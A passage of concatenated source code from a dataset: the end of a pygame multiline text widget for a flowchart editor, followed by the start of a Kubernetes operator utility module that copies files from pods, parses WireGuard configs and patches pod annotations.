if key == keyboard.Left:\n # Move left one word.\n n1, m1 = n, m\n wordStarted = False\n while True:\n if m1 == 0:\n if n1 == 0:\n break\n n1 = n1 - 1\n m1 = len(self.values[n1]) - 1\n else:\n m1 = m1 - 1\n if self.values[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n\n n, m = n1, m1\n self.moveCursor([n, m])\n elif key == keyboard.Right:\n # Move right one word.\n n1, m1 = n, m\n wordStarted = False\n while True:\n if m1 == len(self.values[n1]) - 1:\n if n1 == len(self.values) - 1:\n break\n n1 = n1 + 1\n m1 = 0\n else:\n m1 = m1 + 1\n if self.values[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n n, m = n1, m1\n self.moveCursor([n, m + 1])\n elif key == keyboard.Home:\n # Move to the top of the feature.\n self.moveCursor([0, 0])\n elif key == keyboard.End:\n # Move to the end of the feature.\n self.moveCursor([len(self.values)-1,\n len(self.values[-1])])\n else:\n return\n else:\n return\n\n self.block.master.g_treeModified = True\n\n def setValues(self, values):\n self.values = values\n\n n, m = self.cursorPos\n if n > len(self.values):\n n = len(self.values)\n if m > len(self.values[n]):\n m = 0\n self.cursorPos = [n, m]\n\n def save(self):\n 'Calls the notify function about the changes.'\n if isinstance(self.callback, tuple):\n fn, args = self.callback\n fn(self.values, *args)\n else:\n self.callback(self.values)\n\n self.block.master.g_treeModified = True\n\n n,m = self.cursorPos\n if m > len(self.values[n]):\n self.cursorPos[1] = 0\n\n self.keyEvent = None\n\n def beginEdit(self):\n 'Called when this element\\'s first entered.'\n # Select the whole first line of text.\n self.cursorPos = [0, 0]\n self.selStart = 0\n self.selLength = len(self.values[0])\n\nclass MultilineText(InteractiveFeature):\n def __init__(self, block, values, radius, callback, \\\n pt=(0.,0.), 
bkgColour=None, minWrapWidth=150, \\\n followText='', font=None):\n '''(block, values, radius, callback, point, font)\n - defines a multiline text element.\n\n block: the block to which this element belongs.\n values: a list of the lines of text.\n radius: the radius of the circle within which the entire feature\n must remain.\n callback: a callback function which will be called with the values\n list as its argument when the text changes. May also be\n a tuple of the form (fn, args), in which case the callback\n will execute fn(values, *args).\n pt: the position of the text. Defaults to (0,0).\n bkgColour: if specified, fills in the area behind the text with the\n given colour.\n minWrapWidth: the minimum width to which text will be wrapped in\n pixels.\n followText: a string of text to put at the start of any wrapped line.\n '''\n self.block = block\n self.values = list(values)\n self.callback = callback\n self.pt = pt\n self.radius = radius\n self.bkgColour = bkgColour\n self.textSz = None\n self.minWrapWidth = minWrapWidth\n\n self.cursorPos = [0, 0]\n self.selStart = [0, 0]\n self.selLength = 0\n self.selLines = 0\n\n self.highlightMotion = False\n self.keyEvent = None\n\n if font == None:\n try:\n self.font = Text.defaultFont\n except AttributeError:\n self.font = Text.defaultFont = pygame.font.Font(None, 24)\n else:\n self.font = font\n\n self.followText = followText\n self.followSurface = self.font.render(followText, False, fTxColour)\n self.followWidth = self.followSurface.get_width()\n self.screenWidth = 1024\n self.wordWrap()\n\n try:\n MultilineText.cursor\n except AttributeError:\n try:\n InteractiveText.cursor\n except AttributeError:\n InteractiveText.cursor = ((len(ibeam_strings[0]),len(ibeam_strings)),\\\n (3, 7)) + \\\n pygame.cursors.compile(ibeam_strings)\n MultilineText.cursor = InteractiveText.cursor\n\n def wordWrap(self):\n 'Recalculates the position of line breaks due to word wrapping.'\n\n # Find the height and width of the non-wrapped text.\n # Take into account a minimum wrap width.\n lineSize = self.font.get_linesize()\n numValues = len(self.values)\n assert len(self.values) > 0\n small = max(lineSize * numValues, self.minWrapWidth)\n big = min(max(self.font.size(l)[0] for l in self.values), \\\n self.screenWidth)\n\n if small >= big:\n # Height is greater than width. 
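# --- Illustrative aside (not part of the original source) ---
# The width/height balancing loop inside wordWrap, in isolation: it looks
# for a wrap width at which the wrapped block is roughly as wide as it is
# tall, re-wrapping at the geometric mean of the current bounds each pass.
# wrap_height(width) stands in for "wrap at `width` and return
# line_size * line_count"; any monotonically decreasing function works.
def balanced_width(small, big, wrap_height, iterations=5):
    for _ in range(iterations):
        a = (big * small) ** 0.5    # geometric-mean guess for the width
        b = wrap_height(a)          # resulting height at that width
        if a > b:                   # too wide and short: shrink from above
            big = min(a, big)
            small = max(b, small)
        else:                       # too narrow and tall: grow from below
            big = min(b, big)
            small = max(a, small)
        if small >= big:
            break
    return big

# Treating the text as a fixed 64000 px^2 area gives a square result:
# balanced_width(16.0, 4000.0, lambda w: 64000.0 / w) -> ~253.0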
Line wrapping to maximum width.\n self.wrappedLines, self.lines = self.wrapToWidth(self.screenWidth)\n return\n\n # 5 iterations of algorithm.\n for n in range(5):\n a = (big * small) ** 0.5\n wrappedLines, lines = self.wrapToWidth(a)\n b = lineSize * (len(wrappedLines) + numValues)\n\n # Update our big and small guesses.\n if a > b:\n big = min(a, big)\n small = max(b, small)\n else:\n big = min(b, big)\n small = max(a, small)\n\n if small >= big:\n break\n\n self.wrappedLines = wrappedLines\n self.lines = lines\n\n def wrapToWidth(self, width):\n '''Wraps the line breaks to a maximum line width of width.\n Returns (wrappedLines, lines) where lines is a list lines with this\n wrapping, and wrappedLines is a list of which lines terminate in\n artificial line breaks.'''\n\n i = 0\n follow = 0\n lines = list(self.values)\n wrappedLines = []\n while i < len(lines):\n l = lines[i]\n\n lWidth = self.font.size(l)[0] + follow\n if lWidth < width:\n # No splitting required.\n i = i + 1\n follow = 0\n continue\n\n # Guess where to split the line.\n m = int(round(width * len(l) / lWidth))\n\n # Move until we hit the right point.\n lWidth = self.font.size(l[:m])[0] + follow\n if lWidth >= width:\n while lWidth > width:\n m = m - 1\n lWidth = self.font.size(l[:m])[0] + follow\n else:\n lWidth = self.font.size(l[:m+1])[0] + follow\n while lWidth < width:\n m = m + 1\n lWidth = self.font.size(l[:m+1])[0] + follow\n\n startM = max(1, m)\n\n # Now count backwards until we hit a space.\n while m > 0:\n if l[m-1] == ' ':\n # Found the right point. Split here.\n break\n m = m - 1\n else:\n # Run out of line. Split where we thought at first.\n m = startM\n\n # Perform split.\n wrappedLines.append(i)\n lines.insert(i+1, l[m:])\n lines[i] = l[:m]\n follow = self.followWidth\n i = i + 1\n\n # Return the result.\n return wrappedLines, lines\n\n def screenPos(self, pt):\n '''internal. Convert from actual co-ordinates to displayed co-ordinates\n based on word wrap positions.'''\n\n n,m = pt\n\n # Get vertical position.\n for i in self.wrappedLines:\n if i == n:\n # Get horizontal position.\n if m <= len(self.lines[n]):\n break\n m = m - len(self.lines[n])\n elif i > n:\n break\n n = n + 1\n\n return [n, m]\n\n def actualPos(self, pt):\n '''internal. Convert from displayed co-ordinates to actual co-ordinates\n based on word wrap.'''\n\n n, m = pt\n if n == 0:\n return [n, m]\n\n # Get horizontal position.\n x = n - 1\n while x >= 0:\n if x not in self.wrappedLines:\n break\n m = m + len(self.lines[x])\n x = x - 1\n\n # Get vertical position.\n x = n\n for i in self.wrappedLines:\n if i >= x:\n break\n n = n - 1\n\n return [n, m]\n\n def tick(self):\n if self.keyEvent:\n # Repeated keypress processing.\n if time.time() >= self.repeatTime:\n self.processKeystroke(self.keyEvent)\n self.repeatTime = time.time() + repeatRate\n self.block.g_treeModified = True\n\n def draw(self, screen):\n scsz = screen.get_size()\n self.scArea = scArea = 0.25 * scsz[0] * scsz[1]\n\n # Fix for unknown screen width.\n if scsz[0] != self.screenWidth and self.selLength == 0 == self.selLines:\n self.screenWidth = scsz[0]\n pt = self.actualPos(self.cursorPos)\n self.wordWrap()\n self.cursorPos = self.screenPos(pt)\n\n # 1. 
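# --- Illustrative aside (not part of the original source) ---
# A compact version of the greedy split performed by wrapToWidth above:
# break a line at the last space that still fits, falling back to a hard
# split when a single word exceeds the width. Uses a measure() callback as
# in the earlier asides (font.size would supply it in the real code).
def wrap_line(line, width, measure):
    out = []
    while measure(line) > width:
        m = len(line)
        while m > 1 and measure(line[:m]) > width:
            m -= 1                      # largest prefix that still fits
        split = line.rfind(' ', 0, m + 1)
        if split <= 0:
            split = m                   # no usable space: hard split
        out.append(line[:split])
        line = line[split:].lstrip()
    out.append(line)
    return out

# wrap_line("the quick brown fox", 9, len) -> ['the quick', 'brown fox']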
Render the text.\n lineSize = self.font.get_linesize()\n height = width = 0\n surfaces = []\n for i in range(len(self.lines)):\n s = self.font.render(self.lines[i], False, vTxColour).convert()\n\n surfaces.append(s)\n height = height + lineSize\n w = s.get_width()\n if (i-1) in self.wrappedLines:\n w = w + self.followWidth\n width = max(width, w)\n lastHeight = s.get_height()\n\n # Adjust for hanging characters in the last line.\n if lastHeight > lineSize:\n height = height + lastHeight - lineSize\n\n # 2. Piece it all together.\n surface = pygame.Surface((width, height)).convert()\n if self.bkgColour:\n surface.fill(self.bkgColour)\n else:\n surface.fill(bkgColour)\n surface.set_colorkey(bkgColour)\n\n y = 0.\n for i in range(len(surfaces)):\n s = surfaces[i]\n x = 0\n\n if (i-1) in self.wrappedLines:\n # Indicate that line is wrapped\n surface.blit(self.followSurface, (x, y))\n x = x + self.followWidth\n\n surface.blit(s, (x, y))\n y = y + lineSize\n\n # Find the position.\n pt = self.block.g_absPlacement.parentPoint(self.pt, scArea)\n r = self.block.g_absPlacement.parentLength(self.radius, scArea)\n\n # 3. Check if it needs to be scaled.\n self.sFactor = sFactor = 2. * r / (width ** 2 + height ** 2) ** 0.5\n\n # Cutoff - don't draw.\n if sFactor > 0.3:\n # Scale it if needed.\n if sFactor < 1.:\n width = int(round(width * sFactor))\n height = int(round(height * sFactor))\n surface = pygame.transform.scale(surface, (width, height))\n\n # 4. Put the text.\n putPos = (pt[0] - 0.5*width, pt[1] - 0.5*height)\n screen.blit(surface, putPos)\n self.textSz = (0.5*width, 0.5*height)\n\n # Draw a fine border.\n pygame.draw.rect(screen, bdrColour, \\\n pygame.Rect(putPos, (width+8, height)), 1)\n else:\n self.textSz = None\n\n def drawFinding(self, screen):\n '''Draws this block when the cursors resting on it but it hasn't yet\n been entered.'''\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n\n halfWidth, halfHeight = self.textSz\n x0,y0 = pl.parentPoint(self.pt, scArea)\n x1,y1 = (x0-halfWidth, y0-halfHeight)\n x2,y2 = (x0+halfWidth+8, y0-halfHeight)\n x3,y3 = (x0+halfWidth+8, y0+halfHeight)\n x4,y4 = (x0-halfWidth, y0+halfHeight)\n polygon = [(x1,y1),(x2,y2),(x3,y3),(x4,y4)]\n\n borderColour, fillColour, thickness = RectType.Selected\n\n if fillColour:\n pygame.draw.polygon(screen, fillColour, polygon)\n if borderColour:\n pygame.draw.polygon(screen, borderColour, polygon, thickness)\n\n def drawSelected(self, screen):\n if self.textSz == None:\n return\n\n pl = self.block.g_absPlacement\n scsz = screen.get_size()\n scArea = 0.25 * scsz[0] * scsz[1]\n x0, y0 = pl.parentPoint(self.pt, scArea)\n\n # Choose the appropriate line.\n if self.selLength == 0 == self.selLines:\n n, m = self.cursorPos\n else:\n n, m = self.selStart\n lineSize = self.font.get_linesize()\n y = lineSize * n\n\n # Get the sizes of the different sections.\n sa = self.font.size(self.lines[n][:m])[0]\n\n # Draw a cursor line.\n if (n-1) in self.wrappedLines:\n x = sa + self.followWidth\n else:\n x = sa\n\n if self.sFactor < 1.:\n x = x * self.sFactor\n y = y * self.sFactor\n lineSize = lineSize * self.sFactor\n\n pt0 = (x0 -self.textSz[0] + x, y0 - self.textSz[1] + y)\n\n if self.selLength == 0 == self.selLines:\n # No selection. 
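# --- Illustrative aside (not part of the original source) ---
# Position bookkeeping in the style of screenPos above: convert a
# (row, column) in the unwrapped values to a (row, column) in the wrapped
# display, given the display lines and the set of display rows that end in
# soft (artificial) breaks. A minimal sketch; the inverse mapping
# (actualPos) walks the same data in the other direction.
def to_screen_pos(n, m, lines, wrapped):
    row = 0
    for _ in range(n):                   # rows used by earlier values
        row += 1
        while row - 1 in wrapped:        # skip their soft continuations
            row += 1
    while row in wrapped and m > len(lines[row]):
        m -= len(lines[row])             # spill into continuation rows
        row += 1
    return row, m

# lines = ["hello ", "world", "x"]; wrapped = {0}  (row 0 soft-wrapped)
# to_screen_pos(0, 8, lines, wrapped) -> (1, 2)
# to_screen_pos(1, 0, lines, wrapped) -> (2, 0)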
Just draw cursor.\n pt1 = (x0 - self.textSz[0] + x, y0 - self.textSz[1] + y + lineSize)\n pygame.draw.line(screen, csrColour, pt0, pt1)\n elif self.selLines == 0:\n # Create a surface of the selected text.\n m2 = m + self.selLength\n s = self.font.render(self.lines[n][m:m2], False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n else:\n # Multiline selection.\n\n # Create a surface of this line of the selected text.\n if m < len(self.lines[n]):\n text = self.lines[n][m:]\n if len(text) > 0:\n s = self.font.render(text, False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n # Central section.\n for i in range(n + 1, n + self.selLines):\n if (i-1) in self.wrappedLines:\n x = x0 - self.textSz[0] + self.followWidth\n else:\n x = x0 - self.textSz[0]\n pt0 = (x, pt0[1] + lineSize)\n\n if self.lines[i] == '':\n # Single vertical bar.\n pygame.draw.line(screen, csrColour, pt0, \\\n (pt0[0], pt0[1]+lineSize))\n else:\n s = self.font.render(self.lines[i], False, \\\n tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n # Last line.\n i = n + self.selLines\n if (i-1) in self.wrappedLines:\n x = x0 - self.textSz[0] + self.followWidth\n else:\n x = x0 - self.textSz[0]\n pt0 = (x, pt0[1] + lineSize)\n text = self.lines[i][:self.selLength]\n if text != '':\n s = self.font.render(text,\\\n False, tuple(255-i for i in csrColour), csrColour)\n s.set_colorkey(None)\n\n if self.sFactor < 1.:\n width, height = s.get_size()\n width = int(round(width * self.sFactor))\n height = int(round(height * self.sFactor))\n s = pygame.transform.scale(s, (width, height))\n screen.blit(s, pt0)\n\n def checkMouseHover(self, pos):\n # Check for text not showing.\n if self.textSz == None:\n return False\n\n # Now check for hover over text.\n mPt = self.block.g_absPlacement.parentPoint(pos, self.scArea)\n tPt = self.block.g_absPlacement.parentPoint(self.pt, self.scArea)\n\n # 8-pixel padding on each side where you can still click.\n if tPt[0] - self.textSz[0] - 8 < mPt[0] < tPt[0] + self.textSz[0] + 8:\n if tPt[1] - self.textSz[1] < mPt[1] < tPt[1] + self.textSz[1]:\n self.hoverPos = mPt\n return True\n return False\n\n def mouseHover(self, screen):\n # Do nothing special on a hover.\n pass\n\n def mouseClick(self, actor):\n # Make sure that this text's selected.\n actor.txtClick(self)\n\n # Set the cursor position.\n self.highlightMotion = False\n self.moveCursor(self.getClickPoint(self.hoverPos))\n\n def mouseDrag(self, event):\n self.highlightMotion = True\n self.moveCursor(self.getClickPoint(event.pos))\n\n def getClickPoint(self, point):\n '''internal. 
Returns the coordinates of the specified screen position.\n '''\n\n pl = self.block.g_absPlacement\n x0, y0 = pl.parentPoint(self.pt, self.scArea)\n\n # First find the correct row for the cursor.\n x = point[0] - x0 + self.textSz[0]\n y = point[1] - y0 + self.textSz[1]\n\n lineSize = self.font.get_linesize()\n if self.sFactor < 1.:\n lineSize = lineSize * self.sFactor\n x = x / self.sFactor\n\n n = max(0, min(int(y // lineSize), len(self.lines) - 1))\n\n return [n, self.getClickPointInternal(x, n)]\n\n def getClickPointInternal(self, x, n):\n '''internal. Returns the x-coordinates taken from the specified offset\n from the left side of this block after scaling. n is the line\n number.'''\n\n # Now find the correct column.\n if n-1 in self.wrappedLines:\n s0 = self.followWidth\n else:\n s0 = 0\n s = self.font.size(self.lines[n])[0]\n\n # 1. Guess the position.\n if x <= s0:\n m = 0\n elif x >= s0 + s:\n m = len(self.lines[n])\n else:\n m = int(round(len(self.lines[n]) * (x-s0) / s))\n\n # 2. Refine the guess.\n gDist = self.font.size(self.lines[n][:m])[0] + s0\n\n if gDist < x:\n # We guessed too low.\n while gDist < x:\n diff = x - gDist\n m = m + 1\n gDist = self.font.size(self.lines[n][:m])[0] + s0\n\n # We found the turning point.\n if diff < gDist - x:\n m = m - 1\n elif gDist > x:\n # We guessed too high.\n while gDist > x:\n diff = gDist - x\n m = m - 1\n gDist = self.font.size(self.lines[n][:m])[0] + s0\n\n # Found the turning point.\n if diff < x - gDist:\n m = m + 1\n\n # 3. Return the value.\n return m\n\n def moveCursor(self, pt):\n 'internal. Moves the cursor to a new point.'\n newY, newX = pt\n if not self.highlightMotion:\n self.cursorPos = [newY, newX]\n self.selLength = 0\n self.selLines = 0\n else:\n if not (self.selLength or self.selLines):\n selEnd = self.cursorPos\n elif self.selStart == self.cursorPos:\n selEnd = self.selEnd()\n else:\n selEnd = self.selStart\n\n if newY < selEnd[0] or (newY == selEnd[0] and newX < selEnd[1]):\n self.selLines = selEnd[0] - newY\n if self.selLines == 0:\n self.selLength = selEnd[1] - newX\n else:\n self.selLength = selEnd[1]\n self.selStart = [newY, newX]\n else:\n self.selLines = newY - selEnd[0]\n self.selStart = selEnd\n if self.selLines == 0:\n self.selLength = newX - selEnd[1]\n else:\n self.selLength = newX\n\n self.cursorPos = [newY, newX]\n\n def blankBetween(self, start, end):\n '''internal. Blanks between the two specified positions, which are\n positions in the displayed text.'''\n pos1 = self.actualPos(start)\n pos2 = self.actualPos(end)\n\n if pos1[0] == pos2[0]:\n # All on the same (actual) line.\n x = self.values[pos1[0]]\n self.values[pos1[0]] = x[:pos1[1]] + x[pos2[1]:]\n else:\n # Split across multiple lines.\n for i in range(pos2[0] - pos1[0]-1):\n self.values.pop(pos1[0]+1)\n self.values[pos1[0]] = self.values[pos1[0]][:pos1[1]] + \\\n self.values.pop(pos1[0]+1)[pos2[1]:]\n\n def selEnd(self):\n '''internal. Returns the position of the end of the selection in the\n displayed text.'''\n if not (self.selLength or self.selLines):\n return self.selStart\n if self.selLines:\n return [self.selStart[0] + self.selLines,\n self.selLength]\n else:\n return [self.selStart[0], self.selStart[1] + \\\n self.selLength]\n\n def blankSelection(self):\n 'internal. Blanks the selection. 
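# --- Illustrative aside (not part of the original source) ---
# The selection bookkeeping behind moveCursor, reduced to one dimension: a
# selection is stored as (start, length), so extending it means recovering
# the fixed anchor (the end that is not the cursor) and re-normalising so
# that start is always the earlier end. The original additionally tracks
# selLines for multi-row selections.
def extend_selection(sel_start, sel_length, cursor, new_cursor):
    if sel_length == 0:
        anchor = cursor
    elif sel_start == cursor:
        anchor = sel_start + sel_length
    else:
        anchor = sel_start
    if new_cursor < anchor:
        return new_cursor, anchor - new_cursor
    return anchor, new_cursor - anchor

# extend_selection(0, 0, 4, 7) -> (4, 3)   drag right from column 4
# extend_selection(4, 3, 7, 2) -> (2, 2)   anchor stays at 4, drag left to 2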
Returns True if there was one.'\n if not (self.selLength or self.selLines):\n return False\n savedPos = self.actualPos(self.selStart)\n self.blankBetween(self.selStart, self.selEnd())\n\n self.selLength = 0\n self.selLines = 0\n self.cursorPos = self.screenPos(savedPos)\n\n self.wordWrap()\n return True\n\n def keyUp(self, event, actor):\n 'internal. A key has been released.'\n if self.keyEvent and event.key == self.keyEvent.key:\n self.keyEvent = None\n\n def keyPress(self, event, actor):\n 'internal. A key has been pressed.'\n self.keyEvent = event\n self.actor = actor\n self.processKeystroke(event)\n self.repeatTime = time.time() + repeatLag\n\n def processKeystroke(self, event):\n 'internal. Process a keystroke.'\n\n char = keyboard.charPressed(event.key, event.mod)\n if isinstance(char, str):\n # Translates to a char.\n self.blankSelection()\n n, m = self.actualPos(self.cursorPos)\n self.values[n] = self.values[n][:m] + char + \\\n self.values[n][m:]\n self.wordWrap()\n self.cursorPos = self.screenPos([n, m + 1])\n else:\n key, mod = char\n self.highlightMotion = mod & pgl.KMOD_SHIFT\n mod = mod & ~ pgl.KMOD_SHIFT\n n,m = self.cursorPos\n\n if mod == 0:\n if key == keyboard.Return:\n # Enter.\n self.blankSelection()\n n, m = self.actualPos(self.cursorPos)\n\n # Split the line at this point.\n self.values.insert(n + 1, self.values[n][m:])\n self.values[n] = self.values[n][:m]\n self.wordWrap()\n self.cursorPos = self.screenPos([n + 1, 0])\n elif key == keyboard.Left:\n # Left arrow.\n if m == 0:\n if n != 0:\n self.moveCursor([n-1, len(self.lines[n-1])])\n else:\n self.moveCursor([n, m - 1])\n elif key == keyboard.Right:\n # Right arrow.\n if m < len(self.lines[n]):\n self.moveCursor([n, m + 1])\n elif n < len(self.lines) - 1:\n self.moveCursor([n+1, 0])\n elif key == keyboard.Up:\n # Up arrow.\n if n == 0:\n return\n xPos = self.font.size(self.lines[n][:m])[0]\n if (n-1) in self.wrappedLines:\n xPos = xPos + self.followWidth\n n = n - 1\n m = self.getClickPointInternal(xPos, n)\n self.moveCursor([n, m])\n elif key == keyboard.Down:\n # Down arrow.\n if n == len(self.lines) - 1:\n return\n xPos = self.font.size(self.lines[n][:m])[0]\n if (n-1) in self.wrappedLines:\n xPos = xPos + self.followWidth\n n = n + 1\n m = self.getClickPointInternal(xPos, n)\n self.moveCursor([n, m])\n elif key == keyboard.Home:\n # Home key.\n self.moveCursor([n, 0])\n elif key == keyboard.End:\n # End key.\n self.moveCursor([n, len(self.lines[n])])\n elif key == keyboard.Backspace:\n # Backspace.\n if not self.blankSelection():\n n,m = self.actualPos(self.cursorPos)\n if m > 0:\n self.values[n] = self.values[n][:m-1] + self.values[n][m:]\n m = m - 1\n else:\n # Combine this line with the previous.\n if n > 0:\n m = len(self.values[n-1])\n self.values[n-1] = self.values[n-1] + \\\n self.values.pop(n)\n n = n-1\n else:\n return\n self.wordWrap()\n self.cursorPos = self.screenPos([n, m])\n elif key == keyboard.Delete:\n # Delete.\n if not self.blankSelection():\n n,m = self.actualPos(self.cursorPos)\n if m < len(self.values[n]):\n self.values[n] = self.values[n][:m] + \\\n self.values[n][m+1:]\n else:\n # Combine line with next.\n if n < len(self.values) - 1:\n self.values[n] = self.values[n] + \\\n self.values.pop(n+1)\n else:\n return\n self.wordWrap()\n self.cursorPos = self.screenPos([n, m])\n else:\n return\n elif mod == pgl.KMOD_LCTRL:\n if key == keyboard.Left:\n # Move left one word.\n n1, m1 = n, m\n wordStarted = False\n while True:\n if m1 == 0:\n if n1 == 0:\n break\n if wordStarted:\n break\n n1 = 
n1 - 1\n m1 = len(self.lines[n1]) - 1\n else:\n m1 = m1 - 1\n if self.lines[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n\n n, m = n1, m1\n self.moveCursor([n, m])\n elif key == keyboard.Right:\n # Move right one word.\n n1, m1 = n, m\n if m == len(self.lines[n]):\n m = m - 1\n wordStarted = False\n while True:\n if m1 >= len(self.lines[n1]) - 1:\n if n1 == len(self.lines) - 1:\n break\n if wordStarted:\n break\n n1 = n1 + 1\n m1 = 0\n else:\n m1 = m1 + 1\n if self.lines[n1][m1] == ' ':\n if wordStarted:\n break\n else:\n wordStarted = True\n n, m = n1, m1\n self.moveCursor([n, m + 1])\n elif key == keyboard.Home:\n # Move to the top of the feature.\n self.moveCursor([0, 0])\n elif key == keyboard.End:\n # Move to the end of the feature.\n self.moveCursor([len(self.lines)-1,\n len(self.lines[-1])])\n else:\n return\n else:\n return\n\n self.block.master.g_treeModified = True\n\n def setValues(self, values):\n self.values = values\n self.wordWrap()\n\n n, m = self.cursorPos\n if n > len(self.lines):\n n = len(self.lines)\n if m > len(self.lines[n]):\n m = 0\n self.cursorPos = [n, m]\n\n def save(self):\n 'Calls the notify function about the changes.'\n if isinstance(self.callback, tuple):\n fn, args = self.callback\n fn(self.values, *args)\n else:\n self.callback(self.values)\n\n self.block.master.g_treeModified = True\n\n n,m = self.cursorPos\n if m > len(self.lines[n]):\n self.cursorPos[1] = 0\n\n self.keyEvent = None\n\n def beginEdit(self):\n 'Called when this element\\'s first entered.'\n # Select the whole first line of text.\n self.cursorPos = [0, 0]\n self.selStart = [0, 0]\n self.selLines = len(self.lines) - 1\n self.selLength = len(self.lines[-1])\n\nfrom . import sourceFile\nfrom .actor import SysMode\n\nif __name__ == '__main__':\n from . 
import main\n mb = main.main()\n","repo_name":"Poikilos/flowchartpython","sub_path":"flowchartpython/painter.py","file_name":"painter.py","file_ext":"py","file_size_in_byte":96161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"13497968474","text":"import logging\nimport select\nimport tarfile\nfrom collections import defaultdict\nfrom datetime import datetime\nfrom tempfile import TemporaryFile\nfrom time import sleep\nfrom typing import List\n\nimport kubernetes as k8s\nfrom websocket import ABNF\n\nfrom gefyra.configuration import OperatorConfiguration\n\nlogger = logging.getLogger(\"gefyra.utils\")\n\n\nclass WSFileManager:\n \"\"\"\n WS wrapper to manage read and write bytes in K8s WSClient\n \"\"\"\n\n def __init__(self, ws_client):\n \"\"\"\n\n :param wsclient: Kubernetes WSClient\n \"\"\"\n self.ws_client = ws_client\n\n def read_bytes(self, timeout=0):\n \"\"\"\n Read slice of bytes from stream\n\n :param timeout: read timeout\n :return: stdout, stderr and closed stream flag\n \"\"\"\n stdout_bytes = None\n stderr_bytes = None\n\n if self.ws_client.is_open():\n if not self.ws_client.sock.connected:\n self.ws_client._connected = False\n else:\n r, _, _ = select.select((self.ws_client.sock.sock,), (), (), timeout)\n if r:\n op_code, frame = self.ws_client.sock.recv_data_frame(True)\n if op_code == ABNF.OPCODE_CLOSE:\n self.ws_client._connected = False\n elif op_code == ABNF.OPCODE_BINARY or op_code == ABNF.OPCODE_TEXT:\n data = frame.data\n if len(data) > 1:\n channel = data[0]\n data = data[1:]\n if data:\n if channel == k8s.stream.ws_client.STDOUT_CHANNEL:\n stdout_bytes = data\n elif channel == k8s.stream.ws_client.STDERR_CHANNEL:\n stderr_bytes = data\n return stdout_bytes, stderr_bytes, not self.ws_client._connected\n\n\ndef stream_copy_from_pod(pod_name, namespace, source_path, destination_path):\n # https://stackoverflow.com/questions/59703610/copy-file-from-pod-to-host-by-using-kubernetes-python-client\n\n \"\"\"\n Copy file from pod to the host.\n\n :param pod_name: String. Pod name\n :param namespace: String. Namespace\n :param source_path: String. 
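# --- Illustrative aside (not part of the original source) ---
# The channel demultiplexing read_bytes performs, isolated: each binary
# frame on the Kubernetes exec websocket carries a one-byte channel prefix
# followed by the payload. Channel numbers follow the exec protocol used
# by the kubernetes client (0 stdin, 1 stdout, 2 stderr).
STDOUT_CHANNEL = 1
STDERR_CHANNEL = 2

def demux_frame(data: bytes):
    """Split one raw frame into (stdout_bytes, stderr_bytes)."""
    if len(data) <= 1:
        return None, None                # channel byte only, no payload
    channel, payload = data[0], data[1:]
    if channel == STDOUT_CHANNEL:
        return payload, None
    if channel == STDERR_CHANNEL:
        return None, payload
    return None, None                    # other channels ignored here

# demux_frame(bytes([1]) + b"hello") -> (b"hello", None)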
Pod destination file path\n :param destination_path: Host destination file path\n :return: bool\n \"\"\"\n\n core_v1_api = k8s.client.CoreV1Api()\n\n command_copy = [\"tar\", \"cf\", \"-\", source_path]\n with TemporaryFile() as tar_buffer:\n exec_stream = k8s.stream.stream(\n core_v1_api.connect_get_namespaced_pod_exec,\n pod_name,\n namespace,\n command=command_copy,\n stderr=True,\n stdin=True,\n stdout=True,\n tty=False,\n _preload_content=False,\n )\n # Copy file to stream\n try:\n reader = WSFileManager(exec_stream)\n while True:\n out, err, closed = reader.read_bytes()\n if out:\n tar_buffer.write(out)\n elif err:\n logger.debug(\n \"Error copying file {0}\".format(err.decode(\"utf-8\", \"replace\"))\n )\n if closed:\n break\n exec_stream.close()\n tar_buffer.flush()\n tar_buffer.seek(0)\n with tarfile.open(fileobj=tar_buffer, mode=\"r:\") as tar:\n member = tar.getmember(source_path.split(\"/\", 1)[1])\n tar.makefile(member, destination_path)\n return True\n except Exception as e:\n logger.info(e)\n raise e\n\n\ndef read_wireguard_config(raw: str) -> dict:\n \"\"\"\n :param raw: the wireguard config string; similar to TOML but does not comply with\n :return: a parsed dict of the configuration\n \"\"\"\n data = defaultdict(dict)\n _prefix = \"none\"\n for line in raw.split(\"\\n\"):\n try:\n if line.strip() == \"\":\n continue\n elif \"[Interface]\" in line:\n _prefix = \"Interface\"\n continue\n elif \"[Peer]\" in line:\n _prefix = \"Peer\"\n continue\n key, value = line.split(\"=\", 1)\n data[f\"{_prefix}.{key.strip()}\"] = value.strip()\n except Exception as e:\n logger.exception(e)\n return data\n\n\ndef notify_stowaway_pod(\n core_v1_api: k8s.client.CoreV1Api,\n pod_name: str,\n configuration: OperatorConfiguration,\n) -> None:\n \"\"\"\n Notify the Stowaway Pod; causes it to instantly reload mounted configmaps\n :param core_v1_api:\n :param pod_name:\n :param configuration:\n :return:\n \"\"\"\n logger.info(f\"Notify {pod_name}\")\n try:\n core_v1_api.patch_namespaced_pod(\n name=pod_name,\n body={\n \"metadata\": {\n \"annotations\": {\n \"operator\": f\"update-notification-\"\n f\"{datetime.now().strftime('%Y%m%d%H%M%S')}\"\n }\n }\n },\n namespace=configuration.NAMESPACE,\n )\n except k8s.client.exceptions.ApiException as e:\n logger.exception(e)\n sleep(1)\n\n\ndef exec_command_pod(\n api_instance: k8s.client.CoreV1Api,\n pod_name: str,\n namespace: str,\n container_name: str,\n command: List[str],\n run_async: bool = False,\n) -> str:\n \"\"\"\n Exec a command on a Pod and exit\n :param 